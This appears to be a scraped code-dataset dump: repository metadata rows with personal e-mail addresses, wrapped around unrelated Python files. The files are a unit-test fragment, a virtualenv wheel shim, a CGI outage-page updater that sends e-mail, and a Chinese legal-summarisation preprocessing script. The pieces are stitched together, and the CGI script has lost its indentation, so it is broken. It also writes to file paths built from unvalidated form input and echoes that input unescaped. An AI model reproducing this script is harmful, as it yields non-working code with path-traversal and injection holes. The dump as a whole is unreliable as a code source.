        with self.subTest('b'):
            val = True
            x[kv] = val
            self.assertEqual(x[kv], val)
        # (c) advancing the horizon invalidates previously stored keys.
        with self.subTest('c'):
            x.set_horizon(time_now())
            with self.assertRaises(HorizonPassedError):
                x[kv]
    def test_object_dict(self):
        # Missing attributes raise AttributeError rather than returning None.
        v = ObjectDict()
        with self.assertRaises(AttributeError):
            v.attr
"acizov@gmail.com"
] | acizov@gmail.com |
86162c2e3044c4991f3146946be6253becc800fc | d8913c1512146bb42756f61ba0872d73179884eb | /env/bin/wheel3 | 6c5a912cdabbfbc51374fb893594f592a6266ee5 | [
"MIT"
] | permissive | sahin88/Django_Rest_Framework_Redux_React_Estate_App_FullStack | 2ed305c399edfab05ce3653e8bcaf36f09ae9015 | 10e31c4071bcebc0e4401f42084211d170b2ea56 | refs/heads/main | 2023-03-22T17:00:37.102265 | 2021-03-16T17:26:53 | 2021-03-16T17:26:53 | 319,297,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 234 | #!/home/alex/Documents/estate/env/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
    # Standard console-script shim: strip a trailing -script.py/.exe suffix
    # from argv[0] so wheel's CLI reports a clean program name, then dispatch.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"sahinmuratogur@gmail.com"
] | sahinmuratogur@gmail.com | |
c1ec56c62be7e95389e3aeb7ad30f6794d553aba | a1b892c0f5f8c5aa2c67b555b8d1d4b7727a86a4 | /Python/outage/edit_update.py | f28d19d183c03af4d7ba848164e4bf291788d408 | [] | no_license | Vivekdjango/outage | 60f463ae5294d2b33544a19bda34cc2c22dd42c8 | 20cfbc07e6714f0c8c7e685ea389f1b8ef1bfd53 | refs/heads/master | 2021-01-20T04:18:40.023340 | 2017-04-28T06:46:26 | 2017-04-28T06:46:26 | 89,675,693 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,475 | py | #!/usr/bin/python
print "Content-Type: text/html"
print ""
import cgi, cgitb
import re
import smtplib
import codecs
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
form=cgi.FieldStorage()
st=form.getvalue('status')
sub=form.getvalue('subject')
com=form.getvalue('comment')
print com
cm=com.split('\n')
print cm
check=re.search("Communication(.*)",sub)
new=check.group()
i=new.split()
x=i.remove('Communication')
j=' '.join(i).replace(" ","")
html_file=j+'.html'
m=open('/var/www/html/outage/%s'%(html_file),'r+')
o=m.readlines()
m.seek(0)
for i in o:
if i !="<b>ETA:</b>NA<br><br>Regards & Thanks<br>NOC":
m.write(i)
m.truncate()
m.close()
s=open("/var/www/html/outage/%s"%(html_file)).read()
z=re.search('style(.*)',s)
x=z.group()
if st=="amber" and x=="style='color:red'><b><u>Status:</u></b>RED</p>":
s=s.replace(x,"style='color:orange'><b><u>Status:</u></b>AMBER</p>")
f=open("/var/www/html/outage/%s"%(html_file),'w')
f.write(s)
f.close()
elif st=="amber" and x=="style='color:green'><b><u>Status:</u></b>GREEN</p>":
s=s.replace(x,"style='color:orange'><b><u>Status:</u></b>AMBER</p>")
f=open("/var/www/html/outage/%s"%(html_file),'w')
f.write(s)
f.close()
elif st=="resolved" and x=="style='color:red'><b><u>Status:</u></b>RED</p>":
s=s.replace(x,"style='color:green'><b><u>Status:</u></b>GREEN</p>")
f=open("/var/www/html/outage/%s"%(html_file),'w')
f.write(s)
f.close()
elif st=="resolved" and x=="style='color:orange'><b><u>Status:</u></b>AMBER</p>":
s=s.replace(x,"style='color:green'><b><u>Status:</u></b>GREEN</p>")
f=open("/var/www/html/outage/%s"%(html_file),'w')
f.write(s)
f.close()
elif st=="red" and x=="style='color:orange'><b><u>Status:</u></b>AMBER</p>":
s=s.replace(x,"style='color:red'><b><u>Status:</u></b>RED</p>")
f=open("/var/www/html/outage/%s"%(html_file),'w')
f.write(s)
f.close()
elif st=="red" and x=="style='color:green'><b><u>Status:</u></b>GREEN</p>":
s=s.replace(x,"style='color:red'><b><u>Status:</u></b>RED</p>")
f=open("/var/www/html/outage/%s"%(html_file),'w')
f.write(s)
f.close()
#with open("/var/www/html/outage/%s"%html_file, "r") as f:
# lines = f.readlines()
#for index, line in enumerate(lines):
# if line.startswith("ETA \n"):
# break
#lines.insert(index, "<br><ul><li>{0}</li></ul>".format(com))
#
l=[]
for v in cm:
val="<ul><li>%s</li></ul>"%(v)
l.append(val)
print l
#print l.remove('<ul><li>\r</li></ul>')
#val="<br><ul><li>{0}</li></ul>".format(com)
foot="<b>ETA:</b>NA<br><br>Regards & Thanks<br>NOC"
with open("/var/www/html/outage/%s"%html_file, "a") as f:
for ca in l:
f.writelines(ca)
f.write('\n')
f.write('\n')
f.write(foot)
f.close()
ab=codecs.open('/var/www/html/outage/%s'%html_file)
bc=ab.read()
def py_mail(SUBJECT, BODY, TO, FROM):
    """Send BODY as an HTML e-mail with the given subject and addresses.

    SUBJECT/TO/FROM are plain strings; BODY is an HTML document string.
    Propagates whatever smtplib raises on connection/delivery failure.
    """
    MESSAGE = MIMEMultipart('alternative')
    MESSAGE['subject'] = SUBJECT
    MESSAGE['To'] = TO
    MESSAGE['From'] = FROM
    HTML_BODY = MIMEText(BODY, 'html')
    MESSAGE.attach(HTML_BODY)
    # NOTE(review): '<mail server>' is a placeholder host and must be
    # replaced with a real SMTP relay before this can work.
    server = smtplib.SMTP('<mail server>')
    try:
        server.sendmail(FROM, [TO], MESSAGE.as_string())
    finally:
        # Always close the SMTP connection, even when sendmail raises
        # (the original leaked the connection on failure).
        server.quit()
if __name__ == "__main__":
"""Executes if the script is run as main script (for testing purposes)"""
email_content =bc
FROM = '<sender email-id>'
TO ='<receiver1>'
py_mail(sub, email_content, TO, FROM)
| [
"viveksinha@IC0532-L0.corp.inmobi.com"
] | viveksinha@IC0532-L0.corp.inmobi.com |
04481067cae2cdf914133af49338265cf8615ad1 | b306aab9dcea2dd83dda700bc9f7b9f1a32cff3a | /CAIL2020/sfzyzc/sfzyzb/preprocess.py | 90d05468cc6b241abae61ba2d175fe7a69e29aed | [
"Apache-2.0"
] | permissive | Tulpen/CAIL | d6ca9981c7ea2603ae61675ba330a9614cd9398d | c4cfa98ab4ecedbce34a7a5a186830486047540c | refs/heads/master | 2023-04-23T20:07:56.774530 | 2021-04-16T13:18:36 | 2021-04-16T13:18:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,081 | py | import json
import re
from difflib import SequenceMatcher
from query_sim import Query_Similar
import pandas
smallfile = "data/sfzy_small.json"
bigfile = "data/sfzy_big.json"
interfile = "data/inter.json"
# threshold = 0.3
def process_context(line):
    """Cut *line* into clause-sized spans, keeping each delimiter attached.

    Splits on the Chinese/ASCII punctuation set and glues every text chunk
    to the delimiter that follows it; a trailing chunk with no delimiter is
    dropped, and text containing no delimiter yields [].
    """
    pieces = [piece for piece in re.split('([,,:;;。])', line) if len(piece) > 0]
    # Pair even-indexed text chunks with the odd-indexed delimiters.
    merged = [text + sep for text, sep in zip(pieces[::2], pieces[1::2])]
    return merged
# with open(interfile, 'w', encoding='utf-8') as fw:
# with open(smallfile,'r', encoding='utf-8') as fin:
# for line in fin:
# sents = json.loads(line.strip())
# pos = []
# neg = []
# summary = sents['summary']
# text = sents['text']
# sentences = [item['sentence'] for item in text]
# summary_spans = process_context(summary)
# query_sim = Query_Similar(sentences)
# matching_ids = [query_sim.find_similar(span) for span in summary_spans]
# pos = [sentences[i] for i in range(len(sentences)) if i in matching_ids]
# neg = [sentences[i] for i in range(len(sentences)) if i not in matching_ids]
# sents['pos'] = pos
# sents['neg'] = neg
# print('.')
# fw.write(json.dumps(sents, ensure_ascii=False)+"\n")
#
# with open(bigfile,'r', encoding='utf-8') as fin:
# for line in fin:
# sents = json.loads(line.strip())
# pos = []
# neg = []
# summary = sents['summary']
# text = sents['text']
# sentences = [item['sentence'] for item in text]
# summary_spans = process_context(summary)
# query_sim = Query_Similar(sentences)
# matching_ids = [query_sim.find_similar(span) for span in summary_spans]
# pos = [sentences[i] for i in range(len(sentences)) if i in matching_ids]
# neg = [sentences[i] for i in range(len(sentences)) if i not in matching_ids]
# sents['pos'] = pos
# sents['neg'] = neg
# print('.')
# fw.write(json.dumps(sents, ensure_ascii=False)+"\n")
# Flatten the JSON-lines training file into (paragraph_id, sentence) rows
# and dump them as CSV for downstream training.
# NOTE(review): each line is expected to decode to an iterable of sentences
# — TODO confirm the small-file schema (the commented-out code above decodes
# lines into dicts with 'summary'/'text' keys instead).
tag_sents = []
para_id=0
with open(smallfile, 'r', encoding='utf-8') as fin:
    for line in fin:
        print('.')  # progress tick, one dot per input line
        sents = json.loads(line.strip())
        for sent in sents:
            tag_sents.append((para_id,sent))
        para_id += 1
df = pandas.DataFrame(tag_sents, columns=['para','content'])
df.to_csv("data/para_content_train.csv", columns=['para','content'], index=False)
#
# # df = pandas.DataFrame()
# tag_sents = []
# with open(interfile, 'r', encoding='utf-8') as fin:
# for line in fin:
# print('.')
# sents = json.loads(line.strip())
# tag_sents.append(("".join(sents['pos']), sents['summary']))
# df = pandas.DataFrame(tag_sents, columns=['core', 'summary'])
# df.to_csv("data/core_summary_train.csv", columns=['core','summary'], index=False) | [
"bangtech@sina.com"
] | bangtech@sina.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.